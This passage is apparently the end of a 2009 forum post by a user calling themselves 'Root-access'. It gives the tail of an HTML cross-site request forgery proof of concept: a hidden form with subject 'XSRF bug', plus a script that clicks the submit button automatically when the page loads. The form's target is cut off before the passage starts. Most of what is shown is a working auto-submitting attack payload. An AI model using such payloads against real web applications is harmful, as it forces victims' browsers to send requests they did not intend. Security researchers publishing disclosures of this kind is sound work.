    <input type="text" name="subject" value="XSRF bug" />
    <textarea name="message">Found by Root-access</textarea>
    <input type="checkbox" name="cc_email"  value="0" checked="checked">
    <input type="submit" id="xsrf" name="submit" value="O'k">
    </form>
    <script>document.getElementById("xsrf").click();</script>
    </body>
    </html>
    
     
    #40 Root-access, 15 Dec 2009
    Last edited: 15 Dec 2009
Loading...